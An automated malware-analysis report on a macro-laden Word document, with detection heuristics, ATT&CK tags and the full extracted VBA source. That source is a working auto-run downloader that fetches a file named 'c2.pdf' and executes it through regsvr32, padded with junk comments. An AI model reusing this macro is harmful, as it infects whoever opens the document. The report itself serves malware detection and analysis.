MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. The 'autoopen' subroutine is triggered upon opening, which then calls a 'download' function (not fully shown) with a URL and filename 'c2.pdf'. Subsequently, it executes the downloaded file using the Shell() command. This indicates a downloader functionality, aiming to fetch and run a secondary payload.
Heuristics 6
-
ClamAV: Doc.Downloader.GreenBox5-9139204-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
' Sandwich chancellor epa lassitude reference Shell wu & bn & "32 c2.pdf" End Sub -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
#If VBA7 And Win64 Then Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal Iy As LongPtr, ByVal jh As String, ByVal lq As String, ByVal R As LongPtr, ByVal H As LongPtr) As Long #Else -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub autoopen() n = ActiveDocument.CustomXMLParts(ActiveDocument.CustomXMLParts.Count).SelectNodes("//Items")(1).ChildNodes(2).Text -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3875 bytes |
SHA-256: 0588ff700fd7219be98e79cf721c72f7b538f0e6a1f59213a3676365f6ede2b4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "nb"
Function q2(D)
' Maori montreal oakland render
' Reindeer engaged
' Concur
' Individually qualifying
' Efficiently moat superlative downloaded
' Displaying forearm ap magazine funeral
' Neigh
' Controllers largely truant
' Who repentant tepid thirty-one
' Ll
' Muff phases boxer functional
' Film conventions legate insidiously robot shanty
' Magic
' Mimic yours
' Weakening packet beverage guarantees brandon disturbed go-between knob
' Chosen up related
' Delegation key
' Proletariat query veterans collectors
' Legend ron souls
End Function
Sub autoopen()
n = ActiveDocument.CustomXMLParts(ActiveDocument.CustomXMLParts.Count).SelectNodes("//Items")(1).ChildNodes(2).Text
' Horny sealed
' Vodka evaluating
' Mesquite good tutelary
' Receiver
' Lisa
frm.download n, "c2.pdf"
' Corporations obtrude pm crispin
' Firewood fiction variance deg systematically
' Norwegian ratification
' Ebook storm liabilities
' Supplier consisting affront
' Tumults earthenware
' Countryside sm compression parochial edgar
' Largesse islamic
' Enterprises navel camcorder
' Larva cruiser
' Shop expiring hygiene
' Catholic barrage squash disdainful devices
' Readily
' Grandparents stylish
' Monogram creased
' Nice estuary abbreviations bookmarks
' Sandwich chancellor epa lassitude reference
Shell wu & bn & "32 c2.pdf"
End Sub
Attribute VB_Name = "nb1"
Sub e4()
' Propose
' Bali articulate
' Piedmontese follower madonna hoary
' Degenerate
' Number candidacy
' Added examiner
' Resentful thehun interrogate toilette
' Heart-rending weekends
' Harmonize ambien
' Sake africa
' Applaud proportional bali
' Brabant
' Wayne
' Ideas lige
' Prix themselves dimmer
' Begrudge conceptual killed regional
' Suggestions halfway edge
' Stepdaughter dunbar adelaide addition
' Sawn moat rain blocks
' Ventures assembled
' Overdone lenses
' Hypocritical cherry
' Enterprise
' Necklace contumely invitations everyone laconic
' Responsibilities katrina adventure incentive
' Oreilly puzzle treasury placard guano electron
' Emails gratis bestial
' Serious
' Partridge menagerie collector charts traditionary
' Guards emit starting glen
' Maidenhead recipe
' Saucer childbirth subaltern
' Mole integration
' Immorality unreliable recipients
' St allows else eileen
' Db bird died
' Scapegoat essay pj wordy
' Herbs freshmen
' Indebtedness asthma
' Supercilious thaw athletics overcome hunter
' Merge xp
' Discontinued dionysius
' Louse locomotive mastiff crown singer
' Excommunication furtive
End Sub
Attribute VB_Name = "e"
Public Const wu As String = "reg"
Public Const bn As String = "svr"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal Iy As LongPtr, ByVal jh As String, ByVal lq As String, ByVal R As LongPtr, ByVal H As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal Iy As Long, ByVal jh As String, ByVal lq As String, ByVal R As Long, ByVal H As Long) As Long
#End If
Attribute VB_Name = "frm"
Attribute VB_Base = "0{6B8018BF-9C83-4DBE-B9EB-D31245ABD666}{86009E6C-7117-4726-AED7-DEA04D3B7763}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
URLDownloadToFile 0, url, file, 0, 0
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 27136 bytes |
SHA-256: 5980f6b57acd5a407f0bf444bb9caee1923ea97e8b22c72701b419e017280e6e |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.